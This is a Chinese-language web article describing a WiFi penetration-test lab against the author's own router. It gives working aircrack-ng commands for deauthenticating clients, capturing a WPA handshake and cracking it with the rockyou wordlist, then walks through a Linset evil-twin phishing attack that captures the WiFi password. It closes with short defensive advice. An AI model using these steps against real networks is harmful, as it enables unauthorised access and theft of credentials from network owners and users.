面向WiFi密码破解的渗透测试研究 |
您所在的位置:网站首页 › 小米的wifi怎么破解 › 面向WiFi密码破解的渗透测试研究 |
面向WiFi密码破解的渗透测试研究
前言:
WiFi使用现状:目前现代化的社会,WiFi的普及率很高,但人们的防范意识还是相当薄弱,许多家庭和公司的WiFi密码设置都为了方便仍然会使用弱口令,或者选择隐藏WiFi再使用弱口令。 对此,笔者针对隐藏WiFi使用弱口令的情况做了暴力破解的渗透实验。 另外,针对WiFi防范意识薄弱的情况做了WiFi钓鱼的渗透实验。 一、针对隐藏WiFi的弱口令密码爆破使用系统:Kali Linux 使用工具:kali自带的aircrack-ng,RT3070L无线网卡 1、环境搭建 (1)路由器后台设置:使用小米路由器搭建一个隐藏WiFi及设置弱口令密码。 Kali Linux系统虚拟机安装方法此处省略。 (3)接入无线网卡:打开Kali Linux系统,插入无线网卡,确认已连接虚拟机设备。 打开命令行终端,使用命令进行WiFi探测: airmon-ng //查看网卡信息保留原握手包获取窗口,另开一个命令行终端窗口,执行命令进行攻击WiFi用户掉线 aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx wlan0mon //攻击路线 -0 10 是指攻击10次(-0 0是指一直攻击无数次) -a是指bssid值 -c是指连接WiFi的用户mac地址等待握手包抓取成功后,可执行跑密码字典命令来破解WiFi密码。 由于该隐藏WiFi设置的是弱口令密码,因此这里使用kali自带的默认字典: cd /usr/share/wordlists //进入字典所在目录 ls //可查看到有rockyou.txt.gz文件 sudo gunzip rockyou.txt.gz //解压缩字典 ls //可查看到解压后的字典文本 more rockyou.txt //查看字典文本文件跑字典破解过程: aircrack-ng -w rockyou.txt /home/geek/Desktop/wifi/test-01.cap //命令格式:aircrack-ng -w 密码字典文件路径 握手包保存路径实验结果:隐藏WiFi的弱口令密码被秒破,密码为:123456789 使用系统:wifislax中文版 使用工具:wifislax自带的linset,RT3070L无线网卡 1、环境搭建 (1)路由器后台设置:使用小米路由器搭建一个正常开放且设置相对复杂的密码的WiFi。 wifislax中文版虚拟机安装方法: 1、使用VMware Workstation工具,版本不限,这里使用的是12PRO,此软件安装方法省略。 2、–>点击创建新的虚拟机 –>选择典型 –>下一步 3、–>选择稍后安装操作系统 –>下一步 4、–>选择Linux –>选择Ubuntu 64 位 –>下一步 5、–>输入自定义名称 –>选择保存系统文件的路径 –>下一步 6、–>根据自己需求,正常保持默认即可 –>选择将虚拟磁盘拆分成多个文件 –>下一步 7、–>点击完成 8、–>点击编辑虚拟机设置 9、–>修改内存大小为4GB 9、–>点击CD/DVD (SATA) –>选择使用ISO映像文件 –>选择ISO文件路径 –>确定 10、–>开启虚拟机 等待运行开机即可。 打开wifislax系统,插入无线网卡,确认已连接虚拟机设备。 点击左下角蓝色按钮,点击 >无线安全软件 >Wpa >Linset(Evil twin attack –>输入1 –>按回车键 –>输入1 –>回车键 –>进入扫描列表,等待出现目标WiFi后,用鼠标左键点击一下这个窗口任意处。 –>按Ctrl + C –>输入要攻击的WiFi的编号,如这里是输入45 –>按回车键 –>输入1 –>按回车键 –>按回车键 –>输入1 –>按回车键 –>输入1 –>按回车键 右上角弹出WiFi握手包捕获窗口,等待捕获到握手包,如窗口中右上角方出现[WPA handshake: ] 即表示已捕获到握手包。 抓包成功,此时可用鼠标点击该握手包捕获的窗口任意处,按Ctrl +C可停止捕获握手包。 如原窗口出现黑屏现象,可点击窗口任意处,按回车键。 (8)执行攻击–>输入1 –>按回车键 –>输入1 –>按回车键 –>输入1 –>按回车键 进入攻击界面,生成四个窗口,等待用户输入正确WiFi密码。 【用户视角】 用户连接上钓鱼热点后跳转的认证界面: 用户输入错误密码提交后的界面: 用户输入正确密码提交后的界面; 【攻击界面视角】 当用户输入正确的密码提交后,成功获取到WiFi密码:TobeFish@6666 主要防范的思路: 1、提高密码复杂度,包含数字,英文大小写,符号。 2、在路由器后台关闭广播来隐藏WiFi,确实对普通用户效果还行,但同时也要设置复杂密码。 3、提高安全防钓鱼意识,不要在认证页面随意输入WiFi密码。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |